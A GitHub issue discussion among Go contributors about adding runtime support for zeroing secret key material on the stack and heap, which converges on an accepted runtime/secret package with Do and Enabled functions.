@zx2c4? Anyone else?

Comment From: vparla

@rsc If the user forgets to explicitly call Clear (or a code path results where it is not called), what will happen when the object is eventually destroyed? Will it be treated in a special way by the runtime to securely erase the underlying memory backing it?

Comment From: rsc

@vparla, yes it would be cleared when GC'ed.

Comment From: zx2c4

That seems like a step in the wrong direction. Crypto code is going to use the stack. When I make some ECDH calculation, intermediate steps, and even final results, are written all over the stack. That must be cleaned up. Otherwise, there's no point in any of this. (Not to mention temporary heap escapes, which are a whole problem of their own in Go.) I'm afraid that trying to mark things at allocation time is a dead end, which doesn't get us any further than just using one of those mmap-wrapper packages.

The beauty of runtime.PushSecretMode() and runtime.PopSecretMode() is that it applies to everything that happens while it's turned on. There aren't gotchas: if it's allocated or written to the stack when secret mode is count>0, then it'll be zeroed on free (or on count==0 for stack). Want a long lived secret? Allocate it while secret mode is on, which will set the marking on the object. Want to read a file through some buffers and store it in that secret? Same thing - enable secret mode, do your file buffering reads, and put the result in some long lived buffer, and pop secret mode.

IOW, I maintain that https://github.com/golang/go/issues/21865#issuecomment-863241270 solves the problem, while a secret.New/Make does not.

Comment From: elagergren-spideroak

I agree with Jason that clearing the stack is an important aspect of key erasure and would similarly be disappointed if it can't or won't be implemented.

But if so, I hope some sort of heap-based clearing (like Russ' secret.New[T] API) isn't forgotten about. For our use cases, it's equally important and is much preferable to using the system's virtual memory allocators.

Comment From: zx2c4

Your desired secret.New API can be trivially implemented as:

runtime.PushSecretMode()
x := new(T)
runtime.PopSecretMode()
return x

But of course you'll want to copy some data into x too.

Comment From: ianlancetaylor

The problem I see with runtime.PushSecretMode is that using it securely requires a very clear understanding of exactly what it does and does not do, an understanding that is not conveyed by the name.

If code carefully uses secret.New for every local variable that holds a part of the secret data, then it seems to me that it can be relatively secure. So when you say that intermediate steps and final results are written all over the stack, do you mean that it is going to be too difficult to use secret.New consistently and securely? Or is it a performance concern? Thanks.

Comment From: elagergren-spideroak

@zx2c4 That was if PushSecretMode is rejected.

Comment From: zx2c4

The problem I see with runtime.PushSecretMode is that using it securely requires a very clear understanding of exactly what it does and does not do, an understanding that is not conveyed by the name.

I'm not wedded to the name. We can fix that. I do think, however, that the semantics provided are the least likely to cause issues and leaks.

If code carefully uses secret.New for every local variable that holds a part of the secret data, then it seems to me that it can be relatively secure.

What about assembly implementations of crypto? What about finely optimized crypto, like that P256 implementation? What about temporary results of an arithmetic expression that the compiler spills to the stack?

So when you say that intermediate steps and final results are written all over the stack, do you mean that it is going to be too difficult to use secret.New consistently and securely? Or is it a performance concern?

Yes, and yes. But moreover, it's simply infeasible to do. You would have to rewrite every single function that's used in the process of getting or deriving a secret.

Comment From: vparla

I agree that both Stack and Heap use cases are important. I would be pleased with either one vs neither one.

Comment From: astrolox

```
x := secret.New[[32]byte]()
fill x with key material, use it
secret.Clear(&x)

x := secret.Make[[]byte](100)
fill x with key material, use it
secret.Clear(x)
```

I don't see how I would complete the "fill x with key material" step without potentially leaking that key material in some way. I mean the source of the data wouldn't be secret because if it was I wouldn't need this. So without being able to securely fill it, I think this would have limited value.

@rsc How do you propose we fill it securely?

Comment From: rsc

@astrolox, that's a great question and honestly I have no idea. But PushSecretMode/PopSecretMode have exactly the same problem, so I will redirect the question to @zx2c4.

Comment From: rsc

@zx2c4:

I'm not wedded to the name. We can fix that. I do think, however, that the semantics provided are the least likely to cause issues and leaks.

Ian was objecting more to the semantics than the name I think. I don't know that we're even in agreement on what they are. To you, what are the precise semantics provided?

Comment From: elagergren-spideroak

@astrolox No matter the language, I/O is always going to be a problem. If you read bytes from the network they're probably in a kernel buffer somewhere. Or if you read a file. The chat message you type into Signal is probably a SpannableStringBuilder that internally makes copies as needed.

IMO, blocking on this because of I/O is a bit of a distraction. I mean, at the end of the day you're probably gonna display plaintext on the user's screen, right?

Comment From: zx2c4

@astrolox, that's a great question and honestly I have no idea. But PushSecretMode/PopSecretMode have exactly the same problem, so I will redirect the question to @zx2c4.

No, they don't have the same problem:

runtime.PushSecretMode()
key := GenerateRandomKey()
pub := GeneratePubKey(key)
// do some things
longTerm.something = key
runtime.PopSecretMode()

or

buf := network.ReceivePacket()
parts1, parts2 := network.ParsePacket(buf)
reply := make([]byte, 1234)
runtime.PushSecretMode()
output := crypto.DoFancyThings(parts1, parts2, longterm.something)
copy(reply, output.publicReplyPart[:])
longterm.somethingelse = output.somesessionsecret
runtime.PopSecretMode()
network.SendPacket(reply)

Comment From: zx2c4

@zx2c4:

I'm not wedded to the name. We can fix that. I do think, however, that the semantics provided are the least likely to cause issues and leaks.

Ian was objecting more to the semantics than the name I think. I don't know that we're even in agreement on what they are. To you, what are the precise semantics provided?

I've elaborated it a few times in conversation here, but never fully in one place. The closest is here, I guess -- https://github.com/golang/go/issues/21865#issuecomment-863241270 -- so I'll try to do it more clearly now.

Each goroutine's state object in the runtime maintains a private secretModeCount variable. This is incremented by runtime.PushSecretMode() and decremented by runtime.PopSecretMode(). Those then cause the following two semantics:

  • Semantic 1. All heap objects allocated when secretModeCount > 0 have a metadata flag set on them called "secure delete" that causes the GC to memzero them when freeing.
  • Semantic 2. [Option A] When secretModeCount transitions from == 0 to > 0, a new stack is allocated with "secure delete" enabled, and the present one is swapped out, and when secretModeCount transitions from > 0 to == 0, the present stack is swapped out for a new one, without "secure delete" enabled on it.
  • Semantic 2. [Option B] When secretModeCount transitions from > 0 to == 0, the stack is zeroed.

Options 2A and 2B amount to the same thing semantically and only differ in implementation strategy/optimization.

Then there's the question of goroutine propagation we have to decide on. There are two options for that:

  • Option α. If a new goroutine is created by a goroutine with secretModeCount > 0, then the new goroutine is created with secretModeCount = 1.
  • Option β. There is no special handling at all for new goroutine creation. However, we also provide runtime.IsSecretMode() bool that simply returns whether secretModeCount > 0, so that people can do propagation manually if they want.

I can see the arguments for both sides of option α and option β.

Regardless of which options we choose for 2A/2B and α/β, the combination of semantics 1 and 2 makes it possible to easily do crypto and use Go in a normal, natural way, while simply guarding the places that manipulate or allocate secret data with runtime.PushSecretMode() and runtime.PopSecretMode(). Sections of code that are guarded are sure not to leave traces. And if they call into library code while in such a region (such as x/crypto), they keep the same assurances.

On naming, I can see an argument that semantic 2 means "Pop" doesn't quite describe what's happening, and we'd be better off with "Enter" and "Drop" rather than "Push" and "Pop". Or something else. Naming is bikesheddy, but also important for conveying intent, and at the moment, I don't have particularly strong opinions on it. But I do think that semantics 1 and 2, regardless of what they're called, provide some useful assurances.

Comment From: randall77

As I mentioned in https://github.com/golang/go/issues/21865#issuecomment-858004587 , just having {Push/Pop}SecretMode is problematic because we can't reasonably zero the current stack frame on a PopSecretMode.

I think we'd need something like:

func RunUnderSecretMode(f func())

Which does a PushSecretMode-y thing on entry to f and a PopSecretMode-y thing on exit from f (including a panic exit, I guess, although it is less clear how to do that cleanly, unless we squash the panic).

Not sure what would happen to the closure for f and the things it referenced. I think this issue is wanting for some real-world examples of how this would work, so we could see if this would be sufficient. Getting secret args in and secret results out really affects the design.

Comment From: astrolox

No matter the language, I/O is always going to be a problem. If you read bytes from the network they're probably in a kernel buffer somewhere. Or if you read a file. The chat message you type into Signal is probably a SpannableStringBuilder that internally makes copies as needed.

IMO, blocking on this because of I/O is a bit of a distraction. I mean, at the end of the day you're probably gonna display plaintext on the user's screen, right?

@elagergren-spideroak

You're talking about user input such as chat messages, and in that context I agree with you. Even in the context of a user typing their password, I agree with you.

The context of this github issue is for keys. So I'm thinking the secret material which you have stored in encrypted form in a file on your disk. Similar to how SSH stores your private key; for example.

So, assuming that the data in the I/O layer is encrypted, I want a way that I can:

1. load the encrypted data into memory (i.e. I/O)
2. decrypt it into the plaintext I need to protect
3. store the plaintext in memory for later use
4. use the plaintext as necessary

and eventually ensure that it is completely forgotten.

Step 1 doesn't need secure erasure. Steps 2, 3, and 4 ideally need a way to ensure that the secret (or part of the secret) that they know is completely forgotten after the program no longer needs it.

The proposal to simply have a secure box only helps with step 3, it doesn't help with steps 2 or 4.

I don't wish to block anything, I just want to make sure we add something that's actually secure and not just going to make people think they're secure when they're not.

Comment From: rsc

I think this issue is wanting for some real-world examples of how this would work, so we could see if this would be sufficient. Getting secret args in and secret results out really affects the design.

Completely agree with this. @zx2c4 in the code you posted above, what protects longTerm.something? Also, it seems like secret mode would be fooled by sync.Pools. Any code using a sync.Pool might reuse a buffer instead of allocating a new one. The reused buffer will not be marked secret even though a freshly allocated one would.

This all still feels a lot like "magic happens here" as far as the boundaries and how we transition.

What if instead we had a global setting that you can turn on but never turn off that just forces every GC'ed block to be zeroed immediately, and all stack frames to be zeroed at return? That will run slower but at least we understand it. And we couldn't possibly be more secure than that.

Comment From: astrolox

A secure mode which is turned on and never off is an interesting idea. I imagine that would lead to a pattern of using two processes; e.g. one process with secure mode on, and a main process with secure mode off for performance. If that's the way we would want to go, then I would suggest it should be a compile-time option.

Comment From: danderson

[I'm going to call the new runtime mode "secure mode" here, and the values "secure values", even though it's likely a misleading name that needs more bikeshedding. Please don't read into it any more semantic meaning than exactly what @zx2c4 defined above.]

I believe Jason provided some sample implementations further up, showing what a Noise handshake would look like under his proposal. As it happens, I've just finished implementing a noise.Conn, and can confirm that the patch to implement secure zeroing would match his example precisely.

Once that example handshake code has returned and left secure mode, it is the programmer's responsibility to handle the remaining session keys (which were allocated in secure mode) with care. That is, operations on those keys that may leak key data into memory should also be run in secure mode. Said like that, this sounds onerous, and it's tempting to wander into open-ended compiler research to figure out full taint tracking.

However, in practice, those session keys are used in few, well-known places: routines for encryption, decryption, key rotation, and teardown. Making those routines also run in secure mode resolves the practical issues of handling the keys securely.

If you do all this, and also adopt an API style like that of crypto/tls, all these potentially risky uses of the keys are encapsulated in a net.Conn. The caller gets an object that securely handles key material and forward secrecy, without exposing any footguns. The implementers of crypto/tls still need to be careful when implementing TLS, but that's always been the case. Go already makes powerful-but-fragile constructs available to such programmers, via crypto/subtle.

Can you still use these constructs incorrectly, and expose key data? Yes, just like you can use subtle.ConstantTimeByteEq wrong and introduce a timing side-channel in your implementation. I don't think the expectation should be that every Go programmer will have to use secure mode to have nice things. People implementing packages like crypto/tls need it, but can use it to present a safe, non-sharp API to callers.

I think this conversation has determined that we can't have a foolproof zero-on-gc implementation that everyone could use without thinking, because of gotchas like goroutines and sync.Pool. AFAICT, the conversation has gone from there to conclude that we must do nothing instead.

I'd advocate for the alternative: explicitly declare this API to be subtle, and document its sharp edges. Specifically:

  • Place it in crypto/subtle, to further reinforce that it's a sharp knife for use in crypto code, not a generic and friendly memory management mechanism.
  • Document the semantics as specified by @zx2c4 in https://github.com/golang/go/issues/21865#issuecomment-885258028 . In particular, both stack and heap values created in secure mode are securely erased, either at the exit of secure mode (for stack values) or at GC time (for heap values).
  • Call it something less enticing than "secure mode", a name that conveys exactly the one thing the API guarantees, which is zeroing of memory at a particular point in the lifecycle, and nothing else.
  • Decline to handle the edge cases, but document them:
      • In general: heap values that originated from secure mode do not carry any aura or taint; their only special behavior is being zeroed on GC. If you want the secure-ness to propagate, it is your responsibility to enter secure mode as needed.
      • Only heap-allocated values can remain secure after leaving secure mode. Returning an int from your secure-mode function does not result in the caller having a secure value, but returning a *int (or []byte, or...) does.
      • In particular: goroutines created while in secure mode do not inherit secure mode. It is the programmer's responsibility to propagate secure mode if they need to (add a 2-line prologue to the goroutine func).
      • In particular: mixing secure and insecure buffers in a sync.Pool means you may or may not get a secure buffer out of the pool. Don't do that if you care about getting secure memory out of the pool.
      • In particular: you are free to copy(insecureSlice, myPreciousKeys), or otherwise write code that leaks the secure bytes into insecure memory. Don't do that; enter secure mode if you need to securely propagate state from the secure memory.
  • Revise the existing crypto and x/crypto implementations such that, if they are handed slices of secure memory, they will internally preserve that secureness by entering/exiting secure mode appropriately.
  • If you don't care about forward secrecy in your personal threat model, you are still welcome to pass insecure memory to those APIs. If you do, they will not magically fix your lack of forward secrecy, but won't make anything worse either.
  • If you are implementing a higher-level cryptographic protocol (e.g. Noise, TLS), you can use the robust and performant implementations from crypto and x/crypto, because they preserve the properties of secure mode if handed secure secret values.

This API enables implementers such as crypto/tls and wireguard-go to provide stronger guarantees around forward secrecy, and enables the construction of APIs that do not expose the subtleties and limitations of secure mode to their callers. As it happens, such APIs are also reasonably good practice for crypto code anyway.

Comment From: danderson

I forgot one addendum: a process-wide "secure mode all the time for everything" was already discussed up-thread, and the response from folks doing crypto in Go is that it would result in unacceptable performance degradation. I concur with that looking at it from the POV of Tailscale: of the gigabytes of garbage we generate, only a very few bytes need special handling. Making the entire program run worse is a disproportionate cost to pay for forward secrecy, and given that choice, I'd expect ~everyone to give up on forward secrecy (or Go, in the extreme) instead.

Comment From: randall77

I believe Jason provided some sample implementations further up, showing what a Noise handshake would look like under his proposal.

Could you provide a link? Searching for "Jason" or "Noise" in this issue doesn't turn up anything.

Comment From: danderson

I was referring to:

https://github.com/golang/go/issues/21865#issuecomment-857763995 https://github.com/golang/go/issues/21865#issuecomment-857787486

If a real-world sample on a Real(tm) Noise implementation would help, I have a PR in flight that implements a noise.Conn, and would be happy to adapt it (with no-op calls, obviously) to demonstrate what a real implementation would look like, if that helps.

Comment From: rsc

OK, so given Keith's comment about the problem with pop zeroing, it sounds like a closure-based interface would work, like

subtle.KeepSecret(f func())

This function would mark any allocations during f as "must be zeroed as soon as the GC notices they are free", and it would also make sure that any stack frames allocated and deallocated during f are zeroed. "As soon as the GC notices they are free" is a bit imprecise, since maybe the GC will take more time than one might expect to notice. But we can do the best we can.

This is analogous to a hardware enclave, but we should probably avoid that word since it's not actually one.

Do I have that right? Is that a good enough API, @danderson and @zx2c4? Is that implementable, @randall77 and @aclements?

Comment From: randall77

I think so. We'd have to figure out exactly how to do it if f panics, but I suspect it is doable.

Speaking of which, should subtle.KeepSecret do anything nonstandard if f panics (recover the panic, return it as a result, or some such)?

Comment From: aclements

Is KeepSecret too broad of a name? Do we want a name that more precisely indicates this is about zeroing memory and nothing else? You drew a parallel with hardware enclaves, but enclaves are dramatically more isolated than this. (Coincidentally, in today's brainstorming meeting we talked about the possibility of actually putting part of a Go program in an enclave.)

We'd have to figure out exactly how to do it if f panics, but I suspect it is doable.

I think this isn't too bad, though you're right that we have to be careful about this. If the panic is recovered by a defer outside the secret boundary, then I think we have to zero the stack when unwinding to the recovered frame. What we do if the panic is recovered by a defer inside the secret boundary depends on how aggressive we are about zeroing frames on return. If the panic isn't recovered, then the whole process is about to exit, so I don't think that case matters, though we could zero the whole stack.

runtime.Goexit is a related problem, but I think we just have to zero below wherever the secret boundary is before releasing the goroutine's stack.

Comment From: danderson

I believe subtle.KeepSecret(f) would work for implementing proper key erasure, yes. I'll let @zx2c4 speak to the needs of wireguard-go, but for my Noise implementation, I think I can protect everything that matters with that API.

Comment From: rsc

ping @zx2c4: is KeepSecret(f) good enough for WireGuard?

(We'll still have to figure out the right name but let's worry about the semantics for now.)

Comment From: zx2c4

@danderson

  • Revise the existing crypto and x/crypto implementations such that, if they are handed slices of secure memory, they will internally preserve that secureness by entering/exiting secure mode appropriately.

While most of your summary seemed right on, this seemed to stray from the general idea. Namely, crypto and x/crypto can do whatever they want, and if you want to call them using secrets, then you make sure to call them from a KeepSecret block. That way crypto and x/crypto and whatever else (say, a base64 encoder) do not need to be modified. Just the top level call sites.

Comment From: zx2c4

As I mentioned in #21865 (comment), just having {Push/Pop}SecretMode is problematic because we can't reasonably zero the current stack frame on a PopSecretMode.

I think we'd need something like:

func RunUnderSecretMode(f func())

Which does a PushSecretMode-y thing on entry to f and a PopSecretMode-y thing on exit from f (including a panic exit, I guess, although it is less clear how to do that cleanly, unless we squash the panic).

Yea, sure, that'd make sense and fits the bill well. I like the idea of using a closure for this.

Comment From: zx2c4

In particular: goroutines created while in secure mode do not inherit secure mode. It is the programmer's responsibility to propagate secure mode if they need to (add a 2-line prologue to the goroutine func).

Why not? This is one of the things I brought up very early on in this discussion under the rubric of "we have to make a decision about this." If we're going with the closure approach, I suspect that goroutines should inherit the mode, since they're generally children in some way of the closure. There are two options:

  1. make goroutines inherit secret mode from their parent.
  2. provide an .IsRunningUnderSecretMode() bool function so you can check manually whether you're going to want to propagate it.

1 seems simpler. But 2 could also work.


Regardless of what we choose for goroutines, 2 might be a good idea anyway, so that people trying to protect outer scopes can do assertions on key inner scope functions:

func doSomeWork(workLimit int) {
    subtle.DoUnderSecretMode(func() {
        for i := 0; i < workLimit; i++ {
            work := dequeueWorkItem()
            if work == nil {
                break
            }
            processWork(work)
        }
    })
}

func processWork(work workItem) {
    doSensitiveCryptoThing(work)
    doOtherStuff(work)
    doSensitiveCryptoThing(work)
}

func doSensitiveCryptoThing(work workItem) {
    if !subtle.IsUnderSecretMode() {
        panic("we weren't supposed to get here")
    }
    // do some crypto stuff
}

Comment From: FiloSottile

If secret mode is nestable, why not just enter it rather than checking? It would probably make the code simpler too.

I agree that the standard library should not be entering secret mode itself, but should just work well within it.

Propagating to goroutines feels weird to me. It makes it harder to reason about what is in secret mode, and anyway secrets will need to be passed to the child goroutines somehow, and there is nothing ensuring they are only passed to child or secure goroutines. Anyway, no crypto libraries spawn goroutines, so it doesn’t feel necessary.

Comment From: danderson

@danderson

  • Revise the existing crypto and x/crypto implementations such that, if they are handed slices of secure memory, they will internally preserve that secureness by entering/exiting secure mode appropriately.

While most of your summary seemed right on, this seemed to stray from the general idea. Namely, crypto and x/crypto can do whatever they want, and if you want to call them using secrets, then you make sure to call them from a KeepSecret block. That way crypto and x/crypto and whatever else (say, a base64 encoder) do not need to be modified. Just the top level call sites.

That does lead to a mild subtlety: the entire use of an API must be shrouded in KeepSecret, not just individual calls that receive secret values. Otherwise, you could have a New() function that allocates some buffer memory, and a later Encrypt(secretThing) that copies secretThing into the preallocated buffer - which itself is not covered by KeepSecret. That's an extension of the "don't copy(insecure, secure)" rule, but because the copy would be hidden behind an API surface, it's not as obvious as writing the copy() yourself.

My attempt to blunt that edge slightly was to say that, for those well-known libraries, if you KeepSecret only the specific API calls that receive secret data, that's sufficient to preserve the secrecy of the data, and the crypto packages promise to not do things like what I described above. As you say, we can also just state "you must know exactly how the libraries you call are implemented to know how to safely wield them with KeepSecret."

Comment From: danderson

In particular: goroutines created while in secure mode do not inherit secure mode. It is the programmer's responsibility to propagate secure mode if they need to (add a 2-line prologue to the goroutine func).

Why not? This is one of the things I brought up very early on in this discussion under the rubric of "we have to make a decision about this."

I should have clarified that this was just a proposal for which semantics to document, and should have separated that from the proposal to not try and de-sharpen KeepSecret. Sorry about that.

I personally tend towards not propagating secrecy between goroutines, because that requires less mental context for a future reader of the code. If I read the entrypoint code of a goroutine, how do I figure out if it's handling secret things safely?

If goroutines inherit secrecy, I have to find every go callsite that spawns this function, then work out whether all possible execution paths leading to those go calls correctly KeepSecret. If so (and if I didn't miss anything), then that function can safely manipulate secret values. Or you defensively wrap the goroutine's code in subtle.KeepSecret anyway, just so that you're not bound by the secrecy decision your spawning code made (or didn't).

If goroutines don't inherit secrecy, then there's no external context to track: if the goroutine entrypoint wraps itself in subtle.KeepSecret, then that code is protected. If not, it's not. There's no need to inspect how the goroutine is spawned, or any question about whether your goroutine code should subtle.KeepSecret itself.

For my own uses, I'd be fine with either behavior, because in practice I'd still end up writing code as if goroutines don't propagate secrecy, just for my own sanity in keeping track of where secret mode is enabled.

How would this decision (either way) impact the code of, say, wireguard-go? Are you thinking of this in the context of its encryption/decryption goroutines, or some other goroutine-wielding crypto code?

Comment From: rsc

We don't want implicit state, so goroutines can't "inherit" secrecy. They also may keep running after the main function returns, which is another complication.

It does seem like maybe we should have a way for people to ask whether "secret mode" is enabled right now, for purposes like creating goroutines and assertions.

I'd be interested to see @zx2c4's answer to:

How would this decision (either way) impact the code of, say, wireguard-go? Are you thinking of this in the context of its encryption/decryption goroutines, or some other goroutine-wielding crypto code?

Comment From: zx2c4

We don't want implicit state, so goroutines can't "inherit" secrecy. They also may keep running after the main function returns, which is another complication.

So ixnay on inheritance. Ack.

It does seem like maybe we should have a way for people to ask whether "secret mode" is enabled right now, for purposes like creating goroutines and assertions.

Agreed. Trivial to do too, and people (or, uh, me, I guess) will wind up resorting to unsafe hacks to expose the current state anyway. It's just a function that returns a boolean. Go doesn't (currently) have any way of referencing an executing goroutine other than one's own, so implementing that shouldn't incur any complications or races.

How would this decision (either way) impact the code of, say, wireguard-go? Are you thinking of this in the context of its encryption/decryption goroutines, or some other goroutine-wielding crypto code?

crypto.Rand() will be done from secret mode, as well as everything derived from it that should remain secret (e.g. ephemerals, session keys). When the GC cleans up old random buffers, ephemerals, and session keys, it will zero them, since they were created while secret mode was enabled. The encrypt/decrypt routines that later touch the session keys will be run from secret mode too. If entering and exiting secret mode is mostly free from a performance perspective, secret mode will be entered and exited for every packet; otherwise it will be done whenever a dequeue operation is about to block. Non-secret-mode code will pass around references (pointers) to secret-mode-allocated data, but will never dereference it. Depending on how much the auditing hurts my brain, dereferences will be wrapped in a secret-mode assertion-checking accessor, but if I can keep the code clean enough, then I might skip that. This, anyway, is the rough idea, which might change when I get coding.

Comment From: tv42

Being able to use memfd_secret in the future sounds like a useful requirement to consider. https://lwn.net/Articles/865256/

Comment From: rsc

@tv42 thanks for the pointer. I don't quite see how we can use it for things like stacks during secret mode, but I guess a sufficiently complicated GC could arrange for secret allocations to happen there. It doesn't sound like we need to do that in the first implementation, but it also doesn't seem impossible to do later.

Comment From: rsc

OK, so it sounds like we understand the semantics. As far as naming, it sounds like something like

package subtle // import "runtime/subtle"

func DoSecret(f func())
func InSecret() bool

?

Comment From: cespare

Should this really use the same package name as crypto/subtle?

Comment From: danderson

I think I might have suggested the name subtle because I was proposing to put it in crypto/subtle, to inherit the existing warnings that only people writing low-ish level cryptography should be considering it, and that it's easy to hold it wrong if you're not careful.

If this has to live in runtime for other reasons (like having behavior tied deeply into the runtime :) ), IMO it'd be fine to have it just live looseleaf in runtime, and explain its subtlety in the docstrings.

Comment From: FiloSottile

runtime/subtle is likely to end up having to be imported in the same files that import crypto/subtle, which would be a fairly annoying clash.

Comment From: rsc

Are there secrets other than crypto? Should we use crypto/subtle instead of runtime/subtle?

Or we could have runtime/secret, with "In" and "Do".

Comment From: rsc

FWIW, we seem to be converging but there's so much else in Go 1.18 that this seems likely not to happen ~~in~~ until Go 1.19.

Comment From: elagergren-spideroak

that this seems likely not to happen in Go 1.19.

@rsc sorry, just to clarify: do you mean it won't happen until Go 1.19?

Comment From: vparla

Are there secrets other than crypto? Should we use crypto/subtle instead of runtime/subtle?

Or we could have runtime/secret, with "In" and "Do".

Yes, there are secrets and sensitive information not related to cryptographic functions. For example, I might store PII in a variable and want to securely erase it when done with it.

Comment From: danderson

No strong opinions on whether to telegraph that the API is crypto-only, or general purpose. It'll require care to use correctly either way, so it comes down to how big of an audience needs to be warned and educated.

Cryptographic key material is uniquely well suited to this problem, because of the needs of perfect forward secrecy. Other use cases have a less clear threat model for strictly bounding data lifetime in RAM, but with enough additional application design and a lot of bespoke code, you could use this as one facet of a strict data encryption at rest story (e.g. only decrypt user data when specifically handling it, and have some reasonable bounds on prompt erasure from working memory once the handling is complete). I personally don't expect many such uses to arise compared to crypto secret handling use cases, but it's not impossible.

Comment From: rsc

OK, so it sounds like maybe a separate runtime/secret package is best. It can have a long doc comment explaining what it does and does not do, and we don't have the problem of 'subtle' being a catch-all that will attract other things.

So is this the API?

package secret

func Do(f func())
func Enabled() bool

Comment From: danderson

That API SGTM for my own uses.

To summarize the semantics that I think this thread agreed on:

  1. secret.Do(f) zeros all stack frames that were created during the execution of f before secret.Do returns.
  2. secret.Do(f) marks any heap allocations made during the execution of f as needing to be zeroed explicitly when collected by the GC. This marking applies to the entire call graph of f, so f can call alloc-ful helper functions and those allocs inherit the zeroing property.
  3. secret.Do calls can be nested (implication being that the runtime has to track the current "depth" of secret mode to implement the semantics correctly).
  4. secret.Do(f) does not propagate its properties to goroutines created by f's call graph. It is the programmer's responsibility to run secret.Do again as needed from new goroutines.
  5. During secret.Do(f), if f panics or calls runtime.Goexit, the runtime enforces properties 1&2 as if secret.Do(f) had returned normally.
  6. It is the programmer's responsibility to ensure that heap bytes created in secret mode are not copied to non-secret heap bytes. IOW, things like copy(notSecret, secret) and *notSecret = *secret have no new behavior.
  7. secret.Enabled() reports whether secret.Do appears anywhere in the current call stack.

While writing the above, a few other edge cases to consider:

  • If a panic is uncaught and causes the program to terminate, do all currently existing secret stack frames and heap allocations get zeroed before the program exits to the OS?
  • What about if a goroutine calls os.Exit while secret stack/heap values exist?
  • What about unix.Exec?

These all boil down to the same question: when the program ceases to exist entirely, does the secrecy of the memory become the OS's problem, or does the runtime need to try and clean up on the way out?

Comment From: rsc

Re the edge cases, no, none of those clear the memory. If the program is kill -9'ed, the memory is not cleaned up either, nor can it be. It seems like if you've got that problem, the others don't add to it.

At least for the uncaught panic you can put a defer/recover above your secret.Do.

os.Exit has always been just the syscall, not any kind of atexit work. Same with syscall.Exec.

Comment From: rsc

This seems like a likely accept, but not for Go 1.18 (there is enough landing in that release already).

Comment From: rsc

Based on the discussion above, this proposal seems like a likely accept. — rsc for the proposal review group

Comment From: awnumar

Apologies if I've missed previous context on this: why are stack frames zeroed before secret.Do returns, whereas heap allocations are only marked to be zeroed at some unspecified future time when the GC runs?

Comment From: danderson

It's a compromise between what we want for security-critical code, and what promises a GC'd language can offer. Liveness for heap values is determined by the GC, so the soonest we can safely implicitly zero a value is when the GC determines it's no longer used.

For values you control directly, you can zero them explicitly at the time of your choosing, but operating on that memory might have created other heap values (e.g. in standard library functions that handled your bytes), which you can't access explicitly and which can't be implicitly altered while they're alive. So, GC is the soonest those "derived" values can be cleared.

OTOH, the stack is managed inline by function entry/exit code snippets, so function exit is the obvious candidate for the place where a stack frame can safely be zeroed. And since the transition we care about most is from secret mode to non-secret mode, the spec only promises stack zeroing there, to give the implementation as much freedom as possible.

This doesn't provide guarantees as strong as runtime models like refcounted memory, but it still provides a good upgrade of guarantees for perfect forward secrecy: before, we had no guarantee at all that dead sensitive memory would be cleaned up. With this the runtime promises that, if the GC is running periodically, the lifetime of sensitive values won't be "much longer than needed".

Comment From: rsc

No change in consensus, so accepted. 🎉 This issue now tracks the work of implementing the proposal. — rsc for the proposal review group

Comment From: DmitriyMV

So this was accepted, but no work was done (since most of the effort is currently focused on the runtime, generics, and the compiler). Is it still planned to be done at some time in the future?

Comment From: robaho

I don’t understand the concern here. You cannot read another process's memory without root access. If you have root access you can compromise the security of the entire server - including replacing the crypto libraries with compromised versions.

Comment From: nfisher

@robaho not my forte, but my understanding is that it’s to protect things like the key, which is only required briefly, and remove/zero it from memory as quickly as possible. I assume this would minimise damage from things like Spectre attacks as well as more traditional buffer overruns. Commenting mostly to see if my understanding is correct.

Comment From: FiloSottile

I don’t understand the concern here. You cannot read another processed memory without root access. If you have root access you can compromise the security of the entire server - including replacing the crypto libraries with compromised versions.

The most compelling scenario here is a long-running process that is concerned with forward secrecy. If you have a Wireguard server that's been running for a year, and it gets compromised today, the protocol is designed such that it won't be possible to decrypt the past year of recorded traffic. However, if the ephemeral keys are still in memory, that property is lost.

crypto/tls also uses ephemeral key exchanges and rotates session ticket keys for the same reason, but its forward secrecy properties are also weakened by the risk of having old key material remain in memory.

Comment From: robaho

Hmm. That sounds suspect to me. If that machine is compromised at a later date, it is easier to install compromised libraries and use that to access the future - and past - data that any user accessing that server has access to. If the server has ephemeral keys in memory that are of any use, then the server is acting as a “free text” gateway, and compromising a free text gateway is a critical security failure.

Comment From: FiloSottile

Forward secrecy is a widely desired, studied, and implemented property of cryptographic protocols, and such protocols should be safe to implement in Go. We are not re-debating whether forward secrecy has a reason to exist. I suggest looking up the literature on the matter.

Comment From: robaho

You did not refute my point. If the system is compromised so that arbitrary processes can read the memory of another there are far easier ways to steal the keys. This is a red herring initiative that will do next to nothing to secure the system.

Comment From: elagergren-spideroak

@robaho Standards (like Common Criteria) require wiping key material from memory. It's currently ~impossible to do that in Go with any sort of assurance that the key material has indeed been overwritten.

At any rate, this proposal has been accepted so it's very unlikely to be un-accepted.

Comment From: astrolox

@robaho

It depends on the nature of how the system is compromised. Sure, if someone has full control of the server I probably have bigger concerns, but maybe they don't have that. I don't know what possible vulnerabilities may show up in the future that allow people to read the memory of a process (without fully compromising my system).

I do know that I store all secrets encrypted, and would like to be able to treat the memory where the decryption keys are stored a little differently from just regular memory. Things like preventing it from being written to swap, or securely erasing it after its final use, can only benefit us.

As an aside. I know this isn't being actively worked on right now. I keep thinking I might jump in and work on a PR, but never get the time. Would be happy to assist anyone who is thinking about working on this.

Comment From: FiloSottile

Folks, the Go issue tracker, and especially an approved proposal with a large number of subscribers, is not the forum to debate the general worthiness of secret erasure or forward secrecy. I actually am skeptical myself of the value of zeroing out long-term secrets, but ephemeral secrets in forward-secure protocols are a clear, established, and compellingly sufficient use case for this design.

I'm marking this sub-thread as off-topic, including my own comment, nothing personal, I just want to make sure it doesn't devolve into a long debate.

Comment From: robaho

I only brought it up because it seems eerily similar to https://github.com/golang/go/issues/20654 which, after 5 years, ended up no longer being needed.

There are existing alternative implementations of this proposal that do not require a language change (e.g. keep all key/cryptography operations outside of the runtime).

Comment From: sjaconette-google

This has come up recently for me related to coredumps. It's valuable to be able to ensure that a coredump does not contain sensitive key material, in case it is later accessed by a wider set of people or processes than had access to the process that generated the dump. IMO having the ability to automatically zero out memory that contained keys would be extremely useful. See https://www.cybersecuritydive.com/news/microsoft-crash-dump-cabinet-email-hacks/692995/ for a recent example of a real compromise that resulted from key material ending up in a coredump.

Comment From: tv42

@sjaconette-google Your use of the word "ensure" is tricky here. Just clearing secrets after use does not give you "ensure". Zeroing memory is purely for decreasing the risk, and cannot eliminate it.

If the process dies with a signal that causes a core dump, it's too late for the process itself to do anything about the memory contents. The purpose of zeroing secrets after use is to minimize the window in which the secrets might leak into a core file, but it can't prevent that.

